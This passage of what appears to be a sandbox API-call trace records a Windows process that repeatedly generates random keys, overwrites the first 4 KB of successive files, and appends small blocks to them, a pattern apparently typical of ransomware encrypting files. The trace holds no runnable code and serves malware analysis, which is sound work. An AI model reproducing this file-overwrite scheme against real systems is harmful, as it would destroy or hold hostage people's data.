hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.776] GetProcessHeap () returned 0x4f10000 [0085.776] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.776] SetFilePointerEx (in: hFile=0x9d8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.776] WriteFile (in: hFile=0x9d8, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.777] WriteFile (in: hFile=0x9d8, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.777] GetProcessHeap () returned 0x4f10000 [0085.777] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.777] GetProcessHeap () returned 0x4f10000 [0085.777] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.777] GetProcessHeap () returned 0x4f10000 [0085.777] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.777] CloseHandle (hObject=0x9d8) returned 1 [0085.781] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 152 [0085.781] SetFilePointerEx (in: hFile=0x9dc, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.781] ReadFile (in: hFile=0x9dc, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.781] SetFilePointerEx (in: hFile=0x9dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.781] GetProcessHeap () returned 0x4f10000 [0085.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.781] GetProcessHeap () returned 0x4f10000 [0085.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.781] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.781] GetProcessHeap () returned 0x4f10000 [0085.781] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.781] ReadFile (in: hFile=0x9dc, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.829] SetFilePointerEx (in: hFile=0x9dc, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.829] WriteFile (in: hFile=0x9dc, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.829] GetProcessHeap () returned 0x4f10000 [0085.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.829] GetProcessHeap () returned 0x4f10000 [0085.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.829] GetProcessHeap () returned 0x4f10000 [0085.829] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.829] GetProcessHeap () returned 0x4f10000 [0085.829] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.830] GetProcessHeap () returned 0x4f10000 [0085.830] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.831] GetProcessHeap () returned 0x4f10000 [0085.831] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.832] GetProcessHeap () returned 0x4f10000 [0085.832] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.833] GetProcessHeap () returned 0x4f10000 [0085.833] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0085.834] SetFilePointerEx (in: hFile=0x9dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.834] WriteFile (in: hFile=0x9dc, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0085.834] WriteFile (in: hFile=0x9dc, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.834] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0085.834] GetProcessHeap () returned 0x4f10000 [0085.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0085.835] GetProcessHeap () returned 0x4f10000 [0085.835] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0085.835] CloseHandle (hObject=0x9dc) returned 1 [0085.837] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 153 [0085.837] SetFilePointerEx (in: hFile=0x9e0, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.838] ReadFile (in: hFile=0x9e0, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0085.838] SetFilePointerEx (in: hFile=0x9e0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0085.838] GetProcessHeap () returned 0x4f10000 [0085.838] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0085.838] GetProcessHeap () returned 0x4f10000 [0085.838] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0085.838] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0085.838] GetProcessHeap () returned 0x4f10000 [0085.838] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0085.838] ReadFile (in: hFile=0x9e0, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0085.893] SetFilePointerEx (in: hFile=0x9e0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.893] WriteFile (in: hFile=0x9e0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.894] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.894] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.895] GetProcessHeap () returned 0x4f10000 [0085.895] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0085.896] GetProcessHeap () returned 0x4f10000 [0085.896] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) 